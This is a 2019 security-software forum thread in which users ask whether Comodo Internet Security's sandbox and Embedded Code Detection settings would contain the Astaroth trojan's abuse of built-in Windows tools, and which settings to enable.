Author Topic: Astaroth vs CIS Sandbox and HIPS, what would happen?  (Read 605 times)

Offline ReeceN

  • Comodo's Hero
  • *****
  • Posts: 235
  • Paranoid B#st#rd - CIA
Astaroth vs CIS Sandbox and HIPS, what would happen?
« on: February 28, 2019, 10:45:34 AM »
Astaroth is a Trojan that uses legitimate processes in order to download,install and run the malware.

Overview:


I would expect CIS to contain the malicious modules once they are executed by the relative trusted parent files. Or even contain the Javascript from reaching a none-sandboxed version of BitsAdmin. However I just wanted to double check if either would be the case.

More info on the Astaroth Trojan: https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research

Look forward to learning more about this!
« Last Edit: February 28, 2019, 11:48:39 AM by ReeceN »
Some Comodo wallpapers by me
Wonders what John McAfee will do next.

Offline futuretech

  • Global Moderator
  • Comodo's Hero
  • *****
  • Posts: 4309
Re: Astaroth vs CIS Sandbox and HIPS, what would happen?
« Reply #1 on: February 28, 2019, 11:59:25 AM »
Only if embedded-code detection is turned on for cmd.exe which by default is disabled due to many complaints.

Offline ReeceN

  • Comodo's Hero
  • *****
  • Posts: 235
  • Paranoid B#st#rd - CIA
Re: Astaroth vs CIS Sandbox and HIPS, what would happen?
« Reply #2 on: February 28, 2019, 12:05:02 PM »
So you are saying this might be a bypass on default settings?
Some Comodo wallpapers by me
Wonders what John McAfee will do next.

Offline futuretech

  • Global Moderator
  • Comodo's Hero
  • *****
  • Posts: 4309
Re: Astaroth vs CIS Sandbox and HIPS, what would happen?
« Reply #3 on: February 28, 2019, 12:09:04 PM »
Yes up to a certain extent as I think that once the stage of executing a .dll file using regsrv32 it should be stopped at that point, assuming it doesn't use the avast process if avast is not installed.

Offline ReeceN

  • Comodo's Hero
  • *****
  • Posts: 235
  • Paranoid B#st#rd - CIA
Re: Astaroth vs CIS Sandbox and HIPS, what would happen?
« Reply #4 on: February 28, 2019, 12:19:55 PM »
Ah that is what I was thinking. I wasn't sure on the Javascript bit though.

Very interesting, thanks!
Some Comodo wallpapers by me
Wonders what John McAfee will do next.

Offline 23

  • Comodo's Hero
  • *****
  • Posts: 445
Re: Astaroth vs CIS Sandbox and HIPS, what would happen?
« Reply #5 on: March 01, 2019, 02:08:33 AM »
Only if embedded-code detection is turned on for cmd.exe which by default is disabled due to many complaints.

Sorry, but I missed something. "Only if embedded-code detection is turned on for cmd.exe which by default is disabled" I'm vulnerable or "Only if embedded-code detection is turned on for cmd.exe which by default is disabled" I'm protected?

Offline ReeceN

  • Comodo's Hero
  • *****
  • Posts: 235
  • Paranoid B#st#rd - CIA
Re: Astaroth vs CIS Sandbox and HIPS, what would happen?
« Reply #6 on: March 01, 2019, 05:49:40 AM »
Sorry, but I missed something. "Only if embedded-code detection is turned on for cmd.exe which by default is disabled" I'm vulnerable or "Only if embedded-code detection is turned on for cmd.exe which by default is disabled" I'm protected?

You may be vulnerable to an extent as per mentioned above, if embedded-code detection for cmd.exe is turned off.
« Last Edit: March 01, 2019, 09:19:01 AM by ReeceN »
Some Comodo wallpapers by me
Wonders what John McAfee will do next.

Offline rmcohen

  • Comodo Member
  • **
  • Posts: 42
Re: Astaroth vs CIS Sandbox and HIPS, what would happen?
« Reply #7 on: March 01, 2019, 10:10:50 AM »
I just took a look at my settings, and Embedded Code Detection is disabled for regsrv32 as well as cmd.exe. Does that mean I am completely vulnerable? Is there a best practice for what to enable Embedded Code Detection against?

Offline ReeceN

  • Comodo's Hero
  • *****
  • Posts: 235
  • Paranoid B#st#rd - CIA
Re: Astaroth vs CIS Sandbox and HIPS, what would happen?
« Reply #8 on: March 01, 2019, 10:45:04 AM »
First of all, you may not be completely vulnerable.

This is because the malware relies on .dll files to run the main payload.

Comodo is still likely to contain these .dll files as soon as they are executed. Thus the main payload will likely be contained as normal.

Enabling 'Embedded Code Detection' for cmd.exe may be enough to prevent the exploit up to that point from happening in the first place though.

As for best practice in general of what to enable/disable, I will leave that to someone else to answer.

I would prefer Comodo simply at least enables more files under 'Embedded Code Detection' as default.
« Last Edit: March 01, 2019, 10:52:23 AM by ReeceN »
Some Comodo wallpapers by me
Wonders what John McAfee will do next.

 

Free Endpoint Protection
Seo4Smf 2.0 © SmfMod.Com Smf Destek